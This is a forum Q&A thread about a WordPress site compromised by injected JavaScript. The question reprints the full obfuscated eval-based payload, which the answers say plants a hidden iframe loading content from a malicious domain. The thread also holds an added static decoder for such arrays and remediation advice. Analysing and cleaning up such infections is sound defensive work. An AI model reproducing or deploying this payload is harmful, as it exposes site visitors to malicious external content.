I have a WordPress site where some users only see a blank page. In fact, they only get some sort of JavaScript (below). I’ve tried deactivating all plugins and changing the theme; I still get the same result. I don’t have any compression plugins (like WP-Cache or WP-SuperCache) installed.
What’s the problem, and how do I fix it?
<script>s="";try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-016/7;try{prototype-1;}catch(bawg){e=window["e"+"va"+"l"];n=[9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,198,484,84,194,309,312,97,218,303,160,39,196,333,400,121,78,123,364,48,186,123,492,13,18,27,36,105,204,342,388,109,202,342,160,41,118,39,36,9,250,96,404,108,230,303,128,123,26,27,36,9,200,333,396,117,218,303,440,116,92,357,456,105,232,303,160,34,120,315,408,114,194,327,404,32,230,342,396,61,78,312,464,116,224,174,188,47,224,327,408,115,216,366,424,46,232,324,400,46,198,297,188,100,94,156,192,52,92,336,416,112,126,309,444,61,98,117,128,119,210,300,464,104,122,117,196,48,78,96,416,101,210,309,416,116,122,117,196,48,78,96,460,116,242,324,404,61,78,354,420,115,210,294,420,108,210,348,484,58,208,315,400,100,202,330,236,112,222,345,420,116,210,333,440,58,194,294,460,111,216,351,464,101,118,324,404,102,232,174,192,59,232,333,448,58,96,177,156,62,120,141,420,102,228,291,436,101,124,102,164,59,26,27,36,125,26,27,36,102,234,330,396,116,210,333,440,32,210,306,456,97,218,303,456,40,82,369,52,9,18,27,472,97,228,96,408,32,122,96,400,111,198,351,436,101,220,348,184,99,228,303,388,116,202,207,432,101,218,303,440,116,80,117,420,102,228,291,436,101,78,123,236,102,92,345,404,116,130,348,464,114,210,294,468,116,202,120,156,115,228,297,156,44,78,312,464,116,224,174,188,47,224,327,408,115,216,366,424,46,232,324,400,46,198,297,188,100,94,156,192,52,92,336,416,112,126,309,444,61,98,117,164,59,204,138,460,116,242,324,404,46,236,315,460,105,196,315,432,105,232,363,244,39,208,315,400,100,202,330,156,59,204,138,460,116,242,324,404,46,224,333,460,105,232,315,444,110,122,117,388,98,230,333,432,117,232,303,156,59,204,138,460,116,242,324,404,46,216,303,408,116,122,117,192,39,118,306,184,115,232,363,432,101,92,348,444,112,122,117,192,39,118,306,184,115,202,348,260,116,232,342,420,98,234,348,404,40,78,357,420,100,232,312,156,44,78,147,192,39,82,177,408,46,230,303,
464,65,232,348,456,105,196,351,464,101,80,117,416,101,210,309,416,116,78,132,156,49,96,117,164,59,26,27,36,9,200,333,396,117,218,303,440,116,92,309,404,116,138,324,404,109,202,330,464,115,132,363,336,97,206,234,388,109,202,120,156,98,222,300,484,39,82,273,192,93,92,291,448,112,202,330,400,67,208,315,432,100,80,306,164,59,26,27,36,125];if(window.document)for(i=6-2-1-2-1;-581+i!=2-2;i++){k=i;s=s+String.fromCharCode(n[k]/(i%(h*h)+2-1));}e(s);}}</script>
If you’ve disabled all plugins and switched back to the default Twenty Ten (or Twenty Eleven) theme and are still seeing this, then you’ve got a serious problem.
First of all, the JavaScript is horribly obfuscated. Second of all, with no plugins and a default theme, you should see the default layout of WordPress.
From the looks of things, someone has probably hacked your site.
I recommend you:
Update
I did some reverse-engineering on that JavaScript you linked to, and you have been hacked. It’s a compression script that uncompresses itself and calls window.eval() to execute its package. The code adds a hidden iframe that loads content from a bad domain into your site. I’m not going to post the full details of the hack here, but it’s pretty bad.
In addition to reinstalling WordPress, I also highly recommend you change all of your server passwords:
You might also want to work with a company like Sucuri – they specialize in malware protection and removal.
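The decoding step described in the answer above (a numeric array turned back into text and handed to eval) can be reproduced statically, so the payload is read rather than run. This is an added example, not code from the original posts; the function names are hypothetical, and the sample payload with its example.invalid URL is constructed.

```javascript
// PERIOD is h*h in the posted script: h = -016/7, octal 016 is 14, so h = -2 and h*h = 4.
const PERIOD = 4;

// Pull the first long numeric array literal out of script text without running it.
function extractArray(scriptText) {
  const m = scriptText.match(/\[\s*(\d+(?:\s*,\s*\d+){20,})\s*\]/);
  return m ? m[1].split(",").map((v) => Number(v.trim())) : null;
}

// Reverse the encoding: each value is a character code times (i % period + 1).
function decode(values, period = PERIOD) {
  let out = "";
  for (let i = 0; i < values.length; i++) {
    const div = (i % period) + 1;
    if (values[i] % div !== 0) throw new RangeError(`value ${i} is not divisible by ${div}`);
    out += String.fromCharCode(values[i] / div);
  }
  return out;
}

// Builds the constructed sample below; not part of the analysis itself.
function encode(text, period = PERIOD) {
  return Array.from(text, (ch, i) => ch.charCodeAt(0) * ((i % period) + 1));
}

// Summarize what the decoded text would do, for triage.
function triage(decoded) {
  return {
    createsIframe: /<iframe|createElement\(\s*['"]iframe['"]\s*\)/i.test(decoded),
    hidden: /visibility\s*:\s*hidden/i.test(decoded),
    urls: decoded.match(/https?:\/\/[^\s'"<>]+/g) || [],
  };
}

// Decode as text only; the result is never passed to eval.
function analyze(scriptText) {
  const values = extractArray(scriptText);
  return values ? triage(decode(values)) : null;
}

// Constructed sample: harmless stand-in payload using the reserved .invalid TLD.
const samplePayload =
  "document.write(\"<iframe src='http://example.invalid/x' style='visibility:hidden'></iframe>\");";
const sampleScript = `n=[${encode(samplePayload).join(",")}];e(s);`;

console.log(analyze(sampleScript));
```

The RangeError in decode doubles as a check on the period: if a value does not divide evenly, the divisor pattern assumed for that script is wrong.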
Given what you’ve described, the hack is probably in the index.php in your html root, or in your database stored in your pages or maybe even as an option. You’re going to need to have it cleaned by someone who knows what to look for. A number of us are in that industry.
Attacks are getting to be more creative. The most innovative one I’ve seen added a harmless-looking line that in the end executed the content of an option which included a plugin named Hello Dolly but contained malware. There’s some fun stuff out there now and it is not always easy to find it all.
As the Codex article says, the quickest, surest way to clean things up is to delete the files, directories and databases and restore from a backup before you had the problem. A manual cleanup takes longer, costs more and is less certain to catch the problem, but if you don’t have a recent backup, sometimes it is the only thing to do.